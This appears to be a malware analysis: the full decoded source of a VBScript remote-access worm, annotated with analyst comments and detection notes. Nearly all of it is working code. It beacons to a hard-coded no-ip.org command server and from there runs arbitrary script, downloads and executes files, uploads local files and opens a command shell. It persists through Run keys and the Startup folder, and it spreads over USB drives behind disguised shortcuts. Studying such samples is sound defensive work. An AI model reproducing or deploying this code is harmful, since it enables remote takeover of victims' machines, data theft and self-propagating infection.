Decoded - https://security.stackexchange.com/a/61228/13154

'<[ recoder : houdini (c) skype : houdini-fx ]>
' Analysis notes: decoded VBScript remote-access script. Layout is operator
' configuration, shared COM objects, derived paths, then an endless
' beacon/dispatch loop. "on error resume next" is enabled before the loop,
' so any failing statement is skipped silently for the rest of the script.

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

' Command-and-control endpoint; post() builds "http://" & host & ":" & port & "/" & cmd.
host = "al-ahlii17.no-ip.org"
port = 1155
' Directory the script installs a copy of itself into (expanded below, %temp% fallback).
installdir = "%temp%"
' Switches for the removable-drive shortcut replacement done in install().
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

' The installed copy keeps the original script file name.
installname = wscript.scriptname
' Current user's Startup folder; second persistence location used by upstart().
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
' Field separator used in both directions of the C2 protocol: "<|>".
spliter = "<" & "|" & ">"
' Beacon interval in milliseconds; the "sleep" command changes it at runtime.
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
' Handle kept open on the installed copy (set in instance(), replaced by "update").
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next

' instance(): records the USB-origin marker, installs, relaunches from the
' install path if needed and takes the single-instance file lock.
instance

' Main loop: re-install, poll the C2 with "is-ready", dispatch on the reply.
while true

install

response = ""
' Reply format is <command><|><arg1><|><arg2>; an empty reply matches no case.
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
' "excecute" is the literal token the controller sends. The argument is
' arbitrary VBScript run in-process through the execute statement.
case "excecute"
      param = cmd (1)
      execute param
' Replaces the installed copy with the script body received from the C2,
' relaunches it hidden (//B) and terminates this instance.
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
case "uninstall"
      uninstall
' Fetch and run a file: from the C2 (download) or from any URL (sitedownloader).
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
' Exfiltrate a local file to the C2.
case "recv"
      param = cmd (1)
      upload (param)
' Reconnaissance results are returned through post() under an "is-" path.
case  "enum-driver"
      post "is-enum-driver",enumdriver
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess
' Runs a command line through %comspec% and returns its output.
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)
case  "delete"
      param = cmd (1)
      deletefaf (param)
case  "exit-process"
      param = cmd (1)
      exitprocess (param)
' New beacon interval; the argument is evaluated as a VBScript expression.
case  "sleep"
      param = cmd (1)
      sleep = eval (param)
end select

wscript.sleep sleep

wend
  186.  
  187.  
  188.  
  189.  
  190.  
sub install
' Persistence plus removable-media propagation; called on every loop pass.
' After upstart() (Run keys and Startup copy), each ready drive whose
' drivetype is 1 (removable) receives a hidden+system copy of the script,
' and every file and subfolder in the drive root is hidden and shadowed by a
' .lnk of the same base name that starts the script before opening the
' original item, so the drive still appears to work normally.
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
' drivetype 1 = removable drive.
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        ' attributes 2+4 = hidden + system.
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    ' Files in the drive root; skipped entirely when lnkfile is false.
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            ' Existing .lnk files are not touched (presumably earlier replacements).
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    ' Shortcut takes the original name with the extension removed.
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
                    ' windowstyle 7 = start minimized, keeping the cmd window out of sight.
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    ' cmd /c start <script> & start <original file> & exit; the
                    ' replace() calls quote-wrap spaces inside the names.
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    ' Reads the DefaultIcon registered for the file's extension so the
                    ' shortcut shows the same icon as the hidden original.
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    ' Subfolders in the drive root; skipped when lnkfolder is false. The
    ' shortcut opens the hidden folder in explorer after starting the script.
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        ' Standard folder icon from the registry, so the .lnk looks like a folder.
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub
  318.  
  319.  
  320.  
sub uninstall
' C2-triggered removal: deletes both Run-key values, the Startup copy and the
' running script file, then on every removable drive un-hides the shadowed
' items, deletes the generated .lnk files and the script copy, and finally
' terminates the process.
on error resume next
dim filename
dim foldername

' Run-key value names are the script file name without extension (see upstart()).
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
' drivetype 1 = removable drive, the same selection install() uses.
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 ' attributes 0 clears the hidden+system bits set by install().
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     ' Remove the shortcut that shadowed this file.
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     ' Remove the script copy itself.
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 ' Any remaining .lnk in the drive root is deleted as well.
                 filesystemobj.deletefile (file.path)
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub
  398.  
  399.  
  400.  
function post (cmd ,param)
' Synchronous HTTP POST to the C2. The command name is the URL path, param is
' the request body, and the host profile from information() travels in a
' request header named "user-agent:" (the colon is part of the name as
' written). Returns the response text; the return value is preset to param,
' so under "on error resume next" a failed request yields param instead.
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
  416.  
  417.  
  418.  
function information
' Builds the victim profile sent with every beacon (see post()):
'   hwid <|> computername <|> username <|> OS caption <|> "plus" <|> AV list <|> usbspreading
' The result is cached in the undeclared global "inf" and only computed once.
on error resume next
if  inf = "" then
    inf = hwid & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    ' Only the first OS instance is used.
    for each osinfo in os
       inf = inf & osinfo.caption & spliter
       exit for
    next
    ' Fixed literal, possibly a variant tag; its meaning is not visible here.
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf
else
    information = inf
end if
end function
  460.  
  461.  
  462.  
  463.  
  464.  
sub upstart ()
' Persistence. Writes a Run value under HKCU and HKLM named after the script
' base name, pointing at wscript.exe //B "<installdir>\<installname>", and
' copies the script to installdir and to the user's Startup folder.
' Detection notes: Run values launching wscript.exe //B from %temp% and a
' .vbs copy in the Startup folder are the host artifacts of this routine.
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
' The HKLM write silently fails for non-elevated users under "on error resume next".
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub
  482.  
  483.  
  484.  
  485.  
  486.  
function hwid
' Host identifier for the C2: the volume serial number of the first
' win32_logicaldisk instance that has one. Returns Empty if none is found.
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function
  510.  
  511.  
  512.  
  513.  
  514.  
function security
' Lists installed antivirus products by querying the WMI SecurityCenter
' namespace; "securitycenter2" is chosen when the computed OS version number
' is above 6, otherwise "securitycenter". Returns the display names joined
' with " .", or "nan-av" when nothing was found (or every step failed).
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
' Reads .version on the collection rather than an item; the error is masked,
' so versionstr keeps the value from the loop above.
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
' Note: the loop variable is x but the index used is i, which is never
' assigned, so the appended digits are not the actual minor version parts.
for  x = 1 to ubound (versionstr)
     osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function
  566.  
  567.  
  568.  
  569.  
  570.  
function instance
' Start-up routine, called once before the main loop.
'  1. Reads/creates the marker HKLM\software\<basename>\ that records whether
'     the first run came from a drive root (e.g. a USB stick) plus the date;
'     the value feeds the usbspreading field of the beacon profile.
'  2. Installs via upstart(), and if this process is not the installed copy,
'     launches that copy hidden and exits.
'  3. Opens the installed copy for append and keeps the handle in oneonce;
'     this appears to serve as a single-instance lock, since the script quits
'     when the open fails.
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   ' mid(scriptfullname, 2) = ":\name" exactly when the script runs from a drive root.
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If

upstart
' Compared via 8.3 short paths so differing long/short spellings still match.
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit
end If
err.clear
' Mode 8 = append; the handle is held open for the lifetime of the process.
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function
  626.  
  627.  
  628.  
  629.  
  630.  
sub sitedownloader (fileurl,filename)
' "site-send" handler: HTTP GET of an arbitrary URL, saved as
' <installdir>\<filename> (replacing any existing file) and then executed.
' No "on error resume next" here; the caller's setting is in effect.
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
        ' type 1 = binary stream.
        .type = 1
        .open
        .write objhttpdownload.responsebody
        .savetofile strsaveto
        .close
   end with
   set objstreamdownload = nothing
end if
' Whatever now exists at the save path is run.
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
  688.  
  689.  
  690.  
sub download (fileurl,filedir)
' "send" handler: requests a file from the C2 by POSTing to
' /is-sending<|><fileurl> with an empty body, saves the response body to
' <filedir>\<last path component of fileurl> (installdir when filedir is
' empty) and then executes it.
if filedir = "" then
   filedir = installdir
end if

' Base name taken after the last backslash, so fileurl is a Windows-style path.
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
    set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload
         ' type 1 = binary stream.
         .type = 1
         .open
         .write objhttpdownload.responsebody
         .savetofile strsaveto
         .close
    end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
  752.  
  753.  
  754.  
  755.  
  756.  
function upload (fileurl)
' "recv" handler (exfiltration): reads the local file at fileurl as binary
' and POSTs its contents to /is-recving<|><fileurl> on the C2. Uses a local
' httpobj that shadows the global one. Returns nothing.
dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade
     ' type 1 = binary stream.
     .type = 1
     .open
     .loadfromfile fileurl
     buffer = .read
     .close
end with
' Name mismatch: objstreamuploade is the stream in use; this line releases nothing.
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
  788.  
  789.  
  790.  
  791.  
  792.  
function enumdriver ()
' "enum-driver" reply: one "<path>|<drivetype>" entry per ready drive,
' entries separated by spliter.

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
  808.  
  809.  
  810.  
function enumfaf (enumdir)
' "enum-faf" reply: directory listing of enumdir. The result starts with the
' directory name, then one "<name>|<size>|<d or f>|<attributes>" record per
' subfolder (size left empty) and per file, each terminated by spliter.

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function
  834.  
  835.  
  836.  
  837.  
  838.  
function enumprocess ()
' "enum-process" reply: one "<name>|<pid>|<executablepath>" record per
' win32_process instance, each terminated by spliter.

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
    enumprocess = enumprocess & objitem.name & "|"
    enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
  866.  
  867.  
  868.  
sub exitprocess (pid)
' "exit-process" handler: force-kills the process tree rooted at pid via
' taskkill; window style 7 (minimized) and waits for completion (true).
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
  878.  
  879.  
  880.  
sub deletefaf (url)
' "delete" handler: attempts to delete the path as a file and then as a
' folder; whichever call does not apply fails silently.
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub
  894.  
  895.  
  896.  
function cmdshell (cmd)
' "cmd-shell" handler: runs cmd through %comspec% /c and returns the output.
' Only one stream is read: stdout if it has data, otherwise stderr, otherwise
' an empty string. The local httpobj is declared but unused.

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else
   readallfromany = ""
end if

cmdshell = readallfromany
end function